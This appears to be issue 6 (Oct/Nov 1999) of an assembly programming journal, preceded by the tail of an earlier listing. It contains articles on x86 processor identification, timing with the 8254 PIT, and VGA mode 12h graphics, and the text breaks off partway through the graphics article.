1CB6:0136 2B CA SUB CX,DX ;CX=data length
1CB6:0138 B4 40 MOV AH,40 ;write row to file
1CB6:013A CD 21 INT 21
1CB6:013C FE 4E 02 DEC B [BP+0002] ;loop for row count
1CB6:013F 79 E4 JNS 0125
1CB6:0141 66 58 POP EAX ;clean-up stack
1CB6:0143 B4 3E MOV AH,3E ;close file
1CB6:0145 CD 21 INT 21
1CB6:0147 C3 RET ;go CS:0 !
=D148 14C
1CB6:0148 53 4E 41 50 00 SNAP
=Q
If you've never seen the 2 BIOS calls before then you'd better take a look
at ralf brown's legendary interrupt list.
You may always overide the source segment DS: on a string instruction,
but you cannot override the destination segment ES: ever.
It's left as an exercise for you to incorporate error handling (since there
is none) and still better the length of this code ;)
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Oct/Nov 99
:::\_____\::::::::::. Issue 6
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.comasmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"Processor Identification"........................Chris.Dragan.&.Chili
"Timing with the 8254 PIT"...............................Jan.Verhoeven
"Programming the Universal Graphics Mode"................Jan.Verhoeven
"Conway's Game of Life".................................Laura.Fairhead
"'Ambulance Car' Disassembly"....................................Chili
"'Ambulance Car' Disinfector"....................................Chili
"Assembling for PIC's"...................................Jan.Verhoeven
"Splitting Strings"............................................mammon_
"String to Numeric Conversion"..........................Laura.Fairhead
Column: Win32 Assembly Programming
"WndProc, The Dirty Way".................................X-Calibre
"Programming the DOS Stub"...............................X-Calibre
Column: The Unix World
"Using ioctl()"............................................mammon_
Column: Assembly Language Snippets
"BinToString"....................................Cecchinel Stephan
Column: Issue Solution
"Absolute Value"....................................Laura.Fairhead
----------------------------------------------------------------------
++++++++++++++++++Issue Challenge+++++++++++++++++
Find the Absolute Value of a Register in 4 Bytes
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by mammon_
Customarily I'll start with the bad news: this issue is about a week late,
primarily because I had forgotten about the two Win32 articles X-Calibre
passed on to me a month or two ago. The good news, however, is that there
may be a December issue; currently I have about 5 or so extra articles that
threatened to bump this issue over the 200K mark. Evenutally I may have a
chance to be late on a monthly basis...
This issue has a bit of a 'back to the basics' feel about it. Packed inside
are articles dealing with some of the 'classics' of assembly: CPU identific-
ation, graphics, and the ever-popular Game of Life. The disassembly of the
Ambulance Car virus also has an old-school feeling to it, hearkening back to
the old days of DOS and com files.
Additional highlighs include X-Calibre's 'bending windows to your will' Win32
articles, two excellent chip programming articles from Jan, utility routines
from Laura and myself, and of course my usual attempt to defend assembly as a
viable programming language for the Unix environment.
Enough commentary; time to get this mag on the road!
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Processor Identification
by Chris Dragan & Chili
Being able to identify the processor in which your program is running, can be a
very useful feature, if not to ensure that your program will work on a wider
range of computers, at least to provide minimum compatibility and guarantee it
not to crash on some processors.
The first part of this article explains how to distinguish between older 80486
and lower processors by checking for known behaviours, while the second part
(written by Chris) takes it one step forward, explaining how to use the CPUID
instruction on newer processors, checking the ID register by means of a TFR and
how to correctly identify a Cyrix processor.
EFLAGS Register
---------------
On old pre-286 CPUs, bits 12 through 15 of the FLAGS register are always set,
so we can check for this type of processor, in opposition to newer ones, by
attempting to clear those bits:
pushf
pop ax
and ax, 0fffh ; clear bits 12-15
push ax
popf
pushf
pop ax
and ax, 0f000h
cmp ax, 0f000h ; check if bits 12-15 are set
je _is_an_older_cpu
jne _is_a_286_or_higher
Once we know that we are at least on a 286 processor, we can then check to see
if we're on a 32-bit processor (386 or higher) or on an actual 286. For this
purpose we know that bits 12-15 of the FLAGS register are always clear on a 286
processor in real mode:
pushf
pop ax
or ax, 0f000h ; set bits 12-15
push ax
popf
pushf
pop ax
and ax, 0f000h ; check if bits 12-15 are clear
jz _is_a_286
jnz _is_a_386_or_higher
If instead, the processor is running in protected mode these bits are used for
the IOPL (bits 12-13) and NT (bit 14) flags. Note that bits 12-14 hold the last
value loaded into them on 32-bit processors in real mode. Also remember that
there is no virtual-8086 mode on 16-bit processors.
In order to find out if the processor is in real or protected mode we must test
if the Protection Enable flag (bit 0 of CR0) is set, if so then we're in
protected mode:
smsw ax
and ax, 0001h ; check if bit 0 (PE) is clear
jz _real_mode
jnz _protected_mode
To find out if it is a 486 or a newer processor we'll try to set the AC flag
(bit 18), since it is always clear on a 386 processor (also NexGen Nx586),
unlike newer ones that allow it to be toggled:
pushfd
pop eax
mov ebx,eax
xor eax,40000h ; toggle bit 18
push eax
popfd
pushfd
pop eax
xor eax,ebx ; check if bit 18 changed
jz _is_a_386
jnz _is_a_486_or_higher
And finally to check if we're in an old 486 or in a new 486 and other newer
processors (i.e. Pentium), we'll try to toggle the ID flag (bit 21) which
indicates the presence of a processor that supports the CPUID instruction. This
part is explained below in a section about CPUID.
PUSH SP Instruction
-------------------
Before the 286, processors implemented the "PUSH SP" instruction in a different
way, updating the stack pointer before the value of SP is pushed onto the
stack, unlike newer processors which push the value of the SP register as it
existed before the instruction was executed (both in real and virtual-8086
modes).
Older CPUs 286+
{ {
SP = SP - 2 TEMP = SP
SS:SP = SP SP = SP - 2
} SS:SP = TEMP
}
(credit for the PUSH SP algorithm representation goes to Robert Collins)
So all one has to do is see if the values of the SP register are different
before and after the PUSH SP:
push sp
pop ax
cmp ax, sp ; check if SP values differ
je _is_a_286_or_higher
jne _is_an_older_cpu
Note - If you want the same result on all processors, use the following code
instead of a PUSH SP instruction:
push bp
mov bp, sp
xchg bp, [bp]
Shift and Rotate Instructions
-----------------------------
Starting with the 186/88, all processors mask shift/rotate counts by modulo 32,
restricting the maximum count to 31 (in all operating modes, including the
virtual-8086 mode). Earlier CPUs do not mask the shift/rotation count, using
all 8-bits of CL. So, if we try to perform a 32-bit shift, on newer processors
we'll end up with the same result (since the shift count is masked to 0),
whereas on an older processor the result will be zero:
mov ax, 0ffffh
mov cl, 32
shl ax, cl ; check if result is zero
jz _is_an_older_cpu
jnz _is_a_18x_or_higher
MUL Instruction
---------------
NEC processors differ from Intel's with respect to the handling of the zero
flag (ZF) during a MUL operation. While a NEC V20/V30 does not clear ZF after a
non-zero multiplication result, but only according to it, an Intel 8086/88 will
always clear it (note that this is only true for the specified processors):
xor al, al ; force ZF to set
mov al, 40h
mul al ; check if ZF is clear
jz _is_a_NEC_V20_V30
jnz _is_an_Intel_808x
In addition to the list of sites where you can find more information, provided
by Chris at the end of this article, you can also try this one:
http://grafi.ii.pw.edu.pl/gbm/x86/ (Grzegorz Mazur)
And also the following packages/programs (available somewhere in the net):
The Undocumented PC (Frank van Gilluwe)
HelpPC (David Jurgens)
80x86.CPU file (Christian Ludloff)
ID Register
-----------
Beginning with the 80386 processor, Intel included a so-called ID register,
which contains information about the processor model and stepping. This
register is accessible in an unusual way - it is passed in DX after reset.
To read the ID register one must proceed the following steps:
1. By storing value 0Ah (resume with jump) at address 0Fh (reset code) in the
CMOS data area, inform BIOS not to issue POST after reset, but to return
the control to the program.
2. Update after-reset-far-jump address at 0040h:0067h.
3. Set shutdown status word (0040h:0072h) to 0, to avoid undesirable
side-effects.
4. Cause a reset.
Causing a reset is typically done by issuing a so-called triple-fault-reset,
i.e. causing an error from which the processor cannot recover and enters
a reset state. TFR (triple...) can be done only if we have enough control
over the processor, i.e. under plain DOS in real mode (no EMS) or under
Win'95 (this is risky). The following code shows how to do it in DOS. The code
is assumed to be in a COM program.
;------------------------------------------------------------------------------
section .data
GDT dd 0, 0 ; Selector 0 is empty
dd 0000FFFFh, 00009A00h ; Selector 8 - code segment
GDTR dw 000Fh, 0, 0 ; Limit 0Fh - two selectors
IDTR dw 0, 0, 0 ; Empty IDT will cause TFR
section .text
; Ensure that we are in real mode, not in V86
smsw ax
and al, 1
jnz near _skip_tfr_since_in_v86_mode
; Update code descriptor as we are going to enter pmode
xor eax, eax
mov ax, cs
shl eax, 4
or [GDT+10], eax
add eax, GDT
mov [GDTR+2], eax
; Update reset code in CMOS data area
cli ; Disable interrupts
mov [SaveSP], sp ; Save stack pointer
mov al, 0Fh ; Address 0Fh in CMOS area
out 70h, al
times 3 jmp short $+2 ; Short delay
mov al, 0Ah ; Value 0Ah - far jump
out 71h, al
; Update resume address
push word 0
pop es
mov [es:0467h], word _tfr ; offset
mov [es:0469h], cs ; segment
mov [es:0472h], word 0 ; Update shutdown status
; Switch to pmode
lgdt [GDTR] ; Load GDT
lidt [IDTR] ; Load empty IDT
smsw ax
or al, 01h ; Set pmode bit
lmsw ax
jmp 0008h:_reset ; Reload CS
_reset: mov ax, [cs:0FFFFh] ; Reach beyond segment limit
; After reset we are here with DX containing the ID register
_tfr: cli
mov ax, cs
mov ds, ax
mov es, ax
mov ss, ax
mov sp, [SaveSP]
sti
;------------------------------------------------------------------------------
Of course there are also other ways of reading the ID register. They are well
described in DDJ (www.x86.org).
As said before, the ID register contains information about processor model and
stepping. The format of the register is as follows:
bits 15..12 - stepping
bits 11..8 - model
bits 7..0 - revision
Some example ID register values:
0303 i386DX
2303 i386SX
3301 i376
This format of the ID register was used in Intel 386 processors (all except
RapidCAD), AMD 386 processors and most of IBM 486 processors.
Another format of the ID register was introduced with Intel 486 processors.
This format is similar to the format of CPUID model information (see below),
and until the Pentium was kept the same. However newer processors do not keep
any useful information in the ID register (it is usually 0). This also concerns
Cyrix 486 processors.
bits 15..14 - unused, zero
bits 13..12 - typically indicate overdrive
bits 11..8 - model
bits 7..4 - stepping
bits 3..0 - revision
And some example ID register values with this format for Intel processors:
0401 i486DX-25/33
0421 i486SX
0451 i486SX2
Cyrix DIR
---------
All Cyrix processors have a Device-Identification-Registers, which are used to
identify these processors. To read DIRs, one first has to determine that he
uses a Cyrix processor. This can be accomplished in two ways:
1. On modern processors using CPUID instruction.
2. On first Cyrix processors issuing 5/2 method.
If there is no CPUID instruction, one has to use the other way of
determination. If one knows that he is on a 486 processor, he can use the
following code:
mov ax, 0005h
mov cl, 2
sahf
div cl
lahf
cmp ah, 2
je _we_are_on_cyrix
jne _this_is_not_cyrix
Once we have determined we are on a Cyrix processor, we can read its DIRs to
get its model and stepping information. All Cyrix processors have their special
registers accessible through ports 22h and 23h. Port 22h keeps register number
and port 23h register value.
; This function reads a Cyrix control register
; It expects a register address in AL and returns value also in AL
ReadCCR: out 22h, al ; select register
times 3 jmp short $+2 ; delay
in al, 23h ; get register contents
ret
DIRs have offsets 0FEh (DIR1) and 0FFh (DIR0). DIR1 contains revision, while
DIR0 contains model/stepping. The following code reads them:
mov al, 0FEh
call ReadCCR
mov [DIR1], al
mov al, 0FFh
call ReadCCR
mov [DIR0], al
Example DIR0 values:
1B Cx486DX2
31 6x86(L) clock x2
55 6x86MX clock x4
CPUID Instruction
-----------------
All newer processors have the CPUID instruction, which helps to identify on
what processor we are. Before using it, we must first determine if it is
supported, by flipping the ID flag (bit 21 of EFLAGS).
pushfd
pop eax
xor eax, 00200000h ; flip bit 21
push eax
popfd
pushfd
pop ecx
xor eax, ecx ; check if bit 21 was flipped
jnz _cpuid_supported
jz _no_cpuid
The only problem may be that NexGen processors do not support the ID flag, but
they do support the CPUID instruction. To determine that, we must hook Invalid
Opcode exception (int6) and execute the instruction. If the exception is
triggered, CPUID is not supported.
Also some early Cyrix processors (namely 5x86 and 6x86) have the CPUID
instruction disabled. To enable it, we must first enable extended CCRregisters
and then enable the instruction, setting bit 7 in CCR4.
; Enable extended CCRs
mov al, 0C3h ; C3 corresponds to CCR3
call ReadCCR
and ah, 0Fh ; bits 7..4 of CCR3 <- 0001b
or ah, 10h
call WriteCCR
; Enable CPUID
mov al, 0E8h ; E8 corresponds to CCR4
call ReadCCR
or ah, 80h ; bit 7 enables CPUID
call WriteCCR
The following functions are used to read/write CCRs:
ReadCCR: out 22h, al ; Select control register
times 3 jmp short $+2
xchg al, ah
in al, 23h ; Read the register
xchg al, ah
ret
WriteCCR: out 22h, al ; Select control register
times 3 jmp short $+2
mov al, ah
out 23h, al ; Write the register
ret
After enabling CPUID we must test if it is supported by flipping the ID flag,
unless of course we have determined that we are not on a 5x86 or 6x86 by
reading DIRs.
Once we have determined that CPUID is supported, we can use it to identify the
processor. The instruction expects EAX to hold a function number and returns
information corresponding to this number in EAX, ECX,EDX and EBX. The two most
important levels are listed below.
level 0 (eax=0) returns:
eax Maximum available level
ebx:edx:ecx Vendor ID in ASCII characters
Intel - "GenuineIntel" (ebx='Genu', bl='G'(47h))
AMD - "AuthenticAMD"
Cyrix - "CyrixInstead"
Rise - "RiseRiseRise"
Centaur - "CentaurHauls"
NexGen - "NexGenDriven"
UMC - "UMC UMC UMC "
level 1 (eax=1) returns:
eax bits 13..12 0 - normal
1 - overdrive
2 - secondary in dual system
bits 11..8 model
bits 7..4 stepping
bits 3..0 revision
If Processor Serial Number is enabled, all 32
bits are treated as the high bits (95..64) of
the number.
edx Processor features (e.g. bit 23 indicates MMX)
There are also other levels, i.e. level 2 returns cache and TLB descriptors,
level 3 the rest of Processor Serial Number.
Other processors (AMD, Cyrix) also support extended levels. The first extended
level is 80000000h and it returns in EAX the maximum extended level. These
extended levels return information specific to that processors, e.g. 3DNow!
support or processor name.
This example code determines MMX support:
; First check maximum available level
xor eax, eax ; eax = 0 (level 0)
cpuid
cmp eax, 0
jng _no_higher_levels
; Now check MMX support
mov eax, 1 ; level 1
cpuid
test edx, 00800000h ; bit 23 is set if MMX is supported
jnz _mmx_supported
jz _no_mmx
As this is not the place for listing all the available information about what
values are returned by CPUID, ID register or DIRs, you should get the most
recent information from the processor vendors:
www.intel.com
www.amd.com
www.cyrix.com
Also you can find very valuable information about the identification topic on:
www.sandpile.org
www.x86.org
www.cs.cmu.edu/~ralf/files.html
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Timing with the 8254 PIT
by Jan Verhoeven
Some time ago I saw a note on the mailinglist from someone in need for a
flexible timer function. For this, there are several concepts.
First, there is the timertick which is updated every 55 ms. For long
time delays, this is the best method. Just read the timervalue at
0000:046C, add the desired delay (in 55 ms intervals) and wait until the
timer reaches that value.
A second approach is to use modern BIOS-ses which have a timingfunction
in BIOS interrupt 15h, but this is "only" present on machines from 1990
or later.
A third approach is to reprogram the RTC chip. No big deal, and there's
a very accurate timer in it (upto 8 kHz) which even has interrupt
capabillities for automated functions and simple multitaskings.
But by far the best way (and most universal and accurate) is to use the
"spare" timer in your PC's 8254 chip.
This chip can be put in many operating modes, but we want it to do the
following:
- start counting at a certain value
- count down
- latched reading mode
- no influence on further PC operation
The counting sequence for the PC is as follows:
- there are 2^16 BIOS-timervalue updates per hour
- there are 2^16 8254 clockpulses per timertick
So, there are 2^32 clockpulses per hour. This boils down to one clock
pulse being around 838 ns. Not bad.
In order to make things very clear I use Modula-2 to show how the
routines are coded. Modula is an extremely structured language, so I use
it as a kind of Meta-Assembler or Pseudo-Assembler.
For those not too familiar with Modula: a CARDINAL is not an old man in
a dress, but a 16 bit unsigned integer.
Here comes.....
---------- OpenTimer ---------------------------- Start ----------
PROCEDURE OpenTimer; (* open timer chip in mode 2 *)
BEGIN
ASM
MOV AL, 34H
OUT 43H, AL
XOR AL, AL
OUT 40H, AL
OUT 40H, AL
END;
END OpenTimer;
---------- OpenTimer ----------------------------- End -----------
The value 34h is constructed as follows:
bit function
----- ---------------------------
6 - 7 select counter (0 - 3)
4 - 5 Read/write mode
1 - 3 Select countermode
0 Binary or BCD
For this case we selected:
- counter 00
- read/write two bytes from/to counterchip
- Mode 2
- binary values
These few lines open the timer in "Mode 2" and prime the down counting
register to 0000. I would love to elaborate on the code, but this is all
which is needed....
It is kind of handy if you restore the state of your machine after your
application stops using the CPU. Therefore there is the following
function to restore "normal" operation of this channel.
---------- CloseTimer --------------------------- Start ----------
PROCEDURE CloseTimer; (* close timer chip *)
BEGIN
ASM
MOV AL, 36H
OUT 43H, AL
XOR AL, AL
OUT 40H, AL
OUT 40H, AL
END;
END CloseTimer;
---------- CloseTimer ---------------------------- End -----------
This function just restores the timer to it's default mode and clears
the counting registers. The value "36h" means:
- counter 00
- read/write two bytes from/to counterchip
- Mode 3
- binary values
---------- ReadTimer ---------------------------- Start ----------
PROCEDURE ReadTimer () : CARDINAL; (* read timer *)
VAR Time : CARDINAL;
BEGIN
ASM
MOV AL, 6
OUT 43H, AL
IN AL, 40H
MOV AH, AL
IN AL, 40H
XCHG AH, AL
MOV [Time], AX
END;
RETURN Time;
END ReadTimer;
---------- ReadTimer ----------------------------- End -----------
After we opened the timer, it might be a good idea to also use it. This
is done in a two-step operation:
- current value of counting register is stored in On-Chip buffer
- the low byte is read in first
- the high byte is read in second
- low and high byte are put in right order
Make sure you always read in TWO bytes, else you will run into framing
errors. Also keep in mind that this is a DOWN-COUNTER!
The value "6" which is sent to the 8254 first might be wrong, but in all
my software it just works fine. It selects Channel 0 to be latched. The
lower four bits of this word should be "don't care" bits, but I prefer
"not to fix a running program".
---------- MilliSeconds ------------------------- Start ----------
PROCEDURE MilliSeconds (ms : CARDINAL);
VAR MaxCount : CARDINAL;
BEGIN
MaxCount := 65535 - ms * 1193;
OpenTimer;
WHILE ReadTimer () > MaxCount DO
(* Nothing! *)
END;
CloseTimer;
END MilliSeconds;
---------- MilliSeconds -------------------------- End -----------
This function has some deliberate errors inside. I calculate MaxCount
such that it is too big. Reason: in Modula I do not control math
operations as well as in ASM (of course!) That's why I subtract the
value from 65,535 instead of 65,536. In ASM I would have used a NOT
operation, but for Modula this is good enough.
Furthermore I use the number 1193 to go from counting pulses to
milliseconds. It's a not too big number so it is good enough to use in
integer arithmatics.
This "MilliSeconds" routine is a dumb waiting-procedure. It calculates a
stop-value for the counter, initialises the counter to mode 2 and value
0000 and then waits until the timer reaches there. Next it closes the
timer and it's all over.
The next function, which was made for diagnostic purposes, shows that in
an application you would have to correct for the
---------- TestTimer ---------------------------- Start ----------
PROCEDURE TestTimer;
VAR First, Last, Delta, k : CARDINAL;
BEGIN
OpenTimer;
First := ReadTimer ();
WriteCard (First, 6); Write (Tab);
FOR k := 1 TO 10000 DO
(* Nothing! *)
END;
Last := ReadTimer ();
Delta := First - Last;
WriteCard (Delta, 6); WriteLn;
CloseTimer;
END TestTimer;
---------- TestTimer ----------------------------- End -----------
You could use this routine to calibrate a timingloop, but on modern PC
architectures this could well lead to disasters. Modern CPU's are so
damned fast, that your loopcounter will overflow.
Therefore this calibration technique is only useful for modifying
inherently slow routines, like those using I/O operations. For some
reason, I/O operations still need around one microsecond each, so these
will slow down the routine enough to make sure there will be no overflow
in the loop-counters.
A friend of mine just uses IN instructions from some silly address to
get reasonably accurate timingloops, assuming that 1 IN operation is
about 1 microsecond. Bit it could well lead to trouble on modern PCI
hardware.
All in all, for most delay-routines, the dumb waiting function is by far
the best since it is the most reliable and accurate to less than a
microsecond. But if you need this many digits, use compensated software,
that takes into account the time to read the timers twice -- because you
need to keep in mind that also this routine relies heavily on I/O
instructions, so it is not infinitely fast!
In a future article I will describe how to use the RTC chip for
generating timing signals and how to use it via the Programmable
Interrupt Controller in automatic mode. That article will be pure ASM
again, so don't be worried about this detour into Modula.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Programming for the one and only universal graphics mode
by Jan Verhoeven
If you need to write a graphics routine that has a reasonable resolution and
which is nearly always present, there is just one choice: mode 12h or the well
known 640 x 480 x 16. This mode is the highest resolution mode which is always
available in all VGA cards.
800 x 600 is better but it either needs a VESA driver installed or the user
must himself figure out how to switch the machine to that mode. Not an easy
task for the majority of "experienced Windows users" (isn't this a paradox?).
Mode 12h is treated as a worst case by many Superior Operating Systems. But
for most purposes it is just fine. It's fast, reasonably easy to use and it is
omni present.
That's why I decided to port my textmode windows to this graphics mode.
The application.
----------------
I built a simple AD converter that measures voltages and converts them into
digits. The ADC fits on a COM port and is completely controlled from software.
The idea was to have different reference voltages, sample rates, scaling
factors, a bar graph display and a 4 digit LED-style read-out.
And in the bottom window there is a "recorder" that plots pixels in real-time.
If all parts have been explained I might post the full package (the sources,
the schematics and such) so that everyone can build one for your own.
How to switch to Mode 12h?
--------------------------
Going to mode 12h is easy. Just use the BIOS interrupt 10h as follows:
mov ax, 012
int 010
and you're in. Remember, I use A86 syntax, so all numbers starting with a
nought are considered hexadecimal.
Plotting in a graphics screen.
------------------------------
Now that we're in Mode 012, we should also try to fill that clear black
rectangle. But first we should define a way of remembering WHERE to put our
cute little dots.
For all my plotting, I use the following structure:
-------------------------------- Window Information Block ------
Infoblk1 STRUC
Win_X dw ? ; top-left window position, X and ...
Win_Y dw ? ; ... Y
Win_wid dw ? ; window width and ...
Win_hgt dw ? ; ... height
CurrX dw ? ; within window, current X-coordinate, ...
CurrY dw ? ; ... and Y
DeltaX dw ?
DeltaY dw ?
Indent dw ? ; Indentation for characters in PIXELS!
Multiply dw ? ; screenwidth handler
Watte01 dw ? ;
BoxCol db ? ; border colour
TxtCol db ? ; text colour
BckCol db ? ; background colour
MenuCol db ? ; menu text colour
ENDS
-------------------------------- Window Information Block ------
It will be clear after looking into this list, that each InfoBlock describes a
window, a rectangular portion of the screen, which is treated as a unity.
Each window is defined by the topleft (x,y) coordinates and the window width
and height. Knowing these four words, the window is defined and fixed on
screen. If the window is to be moved, just adjust the topleft (x,y) position.
Since it is handy to know where in this window we are plotting, I defined two
more X and Y values: "CurrX" and "CurrY". When a request to (un)plot is made,
it will start on these coordinates.
For line drawing and such there are the "DeltaX" and "DeltaY" variables. The
former is for horizontal lines, the latter for vertical lines.
Now that we have our fancy window, where we can plot and draw lines, we also
need some text to see what it's all supposed to be about. The text is plotted
at the CurrX and CurrY postions. Each character is PLOTTED there, so tokens
can be put at ANY location on screen, not just on byte boundaries.
For nice and easy alignments, I defined the variable "Indent" which defines
how many pixels from the left or right margin must remain blank.
Since this software should be as easy to adapt to other resolutions as
possible, there is a need for a "Multiply" variable. This is filled with the
offset address of a dedicated screen multiplier routine.
In Mode 012 there are 640 pixels on a line. That's 80 bytes. So in order to
calculate the pixel address you need to use the following formula:
PixAddr = CurrY * 80 + CurrX / 8
So we need a set of damned fast Mul_80 routines. If needed you can make some
of them and at init-time find out the CPU and hardware and assign a suitable
routine and fill it in in the Window definition structures.
The "Watte01" field is just a filler. Reserved by me.
Since the Mode 012 has 16 colours to spare we should also use them. Therefore
I set up space for 4 colours: Box-, Text-, Background- and Menu-colours.
Each printing routine will make sure the right colour is set.
It will be clear that each window is very flexible to use. If the position is
wrong, just change a few numbers. Also if the colours are not optimal.
And by having several windows assigned to the same area on screen, you can
easily build special effects:
fullscrn dw 0, 0,640,480, 0, 0, 0, 0, 4, mul_80, 0
db 12, 14, 3, 15 ; main screen window
FullScrn just describes the complete screen. It is used for some very general
printing an plotting tasks. It starts at topleft (0,0) and is 640 wide and 480
high.
ParWin2 dw 5, 30,630,150, 8, 9, 0, 0, 4, mul_80, 0
db 10, 11, 3, 11 ; Parameter window
This is a window which is a subwindow of the Full Screen for storing data and
parameters.
PlotWin dw 5,195,630,260, 0, 0, 0, 0, 4, mul_80, 0
db 9, 15, 3, 7 ; Virtual plotting window
This is the Virtual Plotting Window. It has some text, plus the actual
plotting window:
PlotWin2 dw 6,196,628,256, 0, 0, 0, 0, 4, mul_80, 0
db 9, 15, 3, 7 ; Actual plotting window
This is the place where the pixels live. It starts one pixel down/right of the
virtual window and also ends one pixel short of it.
The reason for making this "dummy" window structure was that this way there is
no need for an elaborate checking of extreme ends of the window while erasing
pixels. On the extremes of the "Virtual Plotting Window" there are the pixels
that make up a nice coloured box. It looks not nice when these lines are
erased. And the easiest way to prevent this was by defining two separate
windows: one for constructing the box and one for the actual work.
The 4 digit LED-style read-out is also controlled by four different windows.
Each digit has its own window definition:
------------ Digit Space ------------------------------- Start ---
DigSpac1 dw 16, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
db 9, 11, 14, 3 ; Digital display, digit 1, MSD
DigSpac2 dw 56, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
db 9, 11, 14, 3 ; Digital display, digit 2
DigSpac3 dw 96, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
db 9, 11, 12, 3 ; Digital display. digit 3
DigSpac4 dw 136, 90, 40, 50, 0, 0, 0, 0, 0, mul_80, 0
db 9, 11, 12, 3 ; Digital display, digit 4, LSD
MSD = Most Significant Digit LSD = Least Significant Digit
------------ Digit Space -------------------------------- End ----
This way it is convenient to allign the digits on screen. As with normal LED-
style digits, the seven segments of them are drawn piece by piece. And erased
if necessary.
As you will know from voltmeters, the MSD is the least likely to change in
time and the LSD is most likely to be different between any two samples. So in
a way it is necessary to control erasing of just one digit without massive
software overheads. Therefore I again chose to use a separate window for each
digit. It makes erasing the digit easier and independent of the other three.
Something else to observe is, that the two or three digits behind the decimal
point have another colour from those before it. This way the user can easily
see the approximate magnitude of the number without having to search for a
decimal point. This is accomplished easily by having different BckCols in the
LSD windows.
This all costs a few bytes extra, but it saves a lot of coding.
How to quickly load a segment register.
---------------------------------------
Segment registers cannot be loaded with immediate data. So you normally put a
register on the stack and use that to transfer the constant to the actual
segment register. This is not necessary. It can be done much easier like
below:
VGA_base dw 0A000 ; for ease of loading segment registers
And the corresponding code:
mov es, [VGA_base]
The detour via the stack or via AX takes more cycles and bytes.
Defining what to print.
-----------------------
In a graphics screen there are an awful lot of places where to store our
text. So we need a way to define where to put which tokens. For this I use the
following construct:
-------------- Topic ----------------------------------- Start ---
Topic MACRO ; start of printing message
dw #1, #2
db #3, #4
#EM
TopicEnd MACRO ; topics stop here
dw 0F000
#EM
Topic 180, 9, 'Start : '
ParaStrt db 'Manual ', 0
Topic 9, 28, 'Power : '
ParaPowr db 'OFF', 0
Topic 360, 55, 'Group : '
ParaGrup db '16 ', 0
TopicEnd
-------------- Topic ------------------------------------ End ----
The Topic Macro puts the first two arguments (the new values for CurrX and
CurrY) in the first two WORD positions of the definition table. The actual
text is then put in the BYTE positions. In most cases there will be no #4
argument, but A86 doesn't care about that.
Each "to-print" table is shut down by an EndTopic Macro. It defines a new
CurrX of -4096. That clearly is out of range, so this is end of table.
In normal operation, small negative values of CurrX and CurrY are accepted and
taken care of, although it can be dangerous to use this feature.
Multiplying by 80.
------------------
On all CPU's form the 486, the MUL instruction is single cycle, so it'll be
damn fast. For all older CPU's, the following code could mean some significant
speed increases:
-------------------- Multiply ------------------------ Start ----
mul_80: push bx ; PixAddr in Mode 012
shl ax, 4
mov bx, ax ; bx = 16 x SCR_Y
shl ax, 2 ; ax = 64 x SCR_Y
add ax, bx ; ax = 80 x SCR_Y
pop bx
ret
-------------------- Multiply ------------------------- End -----
This routine is used over and over again, so a few microseconds more or less
will make a big difference.
Where to leave our pixels?
--------------------------
Suppose you need to plot pixel (3,0). That's an easy one. It will fit in the
very first byte of the VGA memory array. It's segment is 0A000 and it's offset
is plain 0.
But not the full byte, since that would produce a line. No, we need to access
bit 4 of byte 0.
Yes, the first pixel is bit 7 of byte 0 and the 8th pixel is bit 0 of byte 0.
Or, in index-language, CurrX = 0 addresses bit 7, and so on.
So we need to invert the screenposition into a bitposition. We'll come to that
later. Suppose, by some sheer magic, we succeeded in making that conversion,
we still need to tell the VGA which bit is involved. That's done by means of
the following routine:
--------------------- SetMask ------------------------ Start -------
SetMask: push dx ; ah = mask
mov dx, 03CE
mov al, 8
out dx, ax ; set bit mask
pop dx
ret
--------------------- SetMask ------------------------- End --------
This is an optimized routine. The VGA is a 16 bit card, so we can use 16 bit
I/O instructions for adjacent I/O ports. The construct:
mov al, 8
out dx, ax ; set bit mask
is identical to:
mov al, 8
out dx, al
inc dx
mov al, ah
out dx, al
Anyway, the plottingmask is defined to be as loaded in the AH register. We can
put any value in AH, not just one pixel, but also "no pixels" and "all
pixels".
Defining colour in Mode 012.
----------------------------
Colours to use during plotting are defined in a comparable fashion:
--------------------- Set Colour --------------------- Start -------
SetColr: push dx ; ah = colour
mov dx, 03C4
mov al, 2
out dx, ax ; select page register and colour
pop dx
ret
--------------------- Set Colour ---------------------- End --------
In Mode 013 you just can load a bytevalue colour into a memory location and
that's it. So that's an ultrafast resolution, but at the price of resolution.
In Mode 012 we define colour with a series of I/O instructions. If a colour
got set, it remains active until canceled by another SetColr call. Try to
remember this when all on a sudden all kinds of fancy colours start to appear
on screen....
Where to put the pixel?
-----------------------
I have presented the formula some paragrpahs before this one. Basically we
work with virtual coordinates and must translate these to real coordinates
before trying to calculate an address. This is done by:
------------------ VGA memory address ---------------- Start -------
VGaddr: ; calculate address in VGA memory
mov es, [VGA_base] ; quickly load segment register
mov ax, [di.CurrY] ; ax = current Y
add ax, [di.Win_Y] ; adjust for window offset
call [di.Multiply] ; multiply by bytes per row
mov bx, [di.CurrX] ; bx = current X
add bx, [di.Win_X] ; adjust for window offset
shr bx, 3 ; divide by 8
add bx, ax ; bx = index address into video segment
ret
------------------ VGA memory address ----------------- End --------
It's all fairly straightforward.
How do we plot pixels in Mode 012?
----------------------------------
This is a silly process. We cannot access all the 4 colour planes at once, so
we have used SetColr to define which colourplanes are to be affected. This all
is rather complicated. You may either believe me on my word, or consult a 1200
page reference....
Now that we're ready to plot pixels, we do so by the following code:
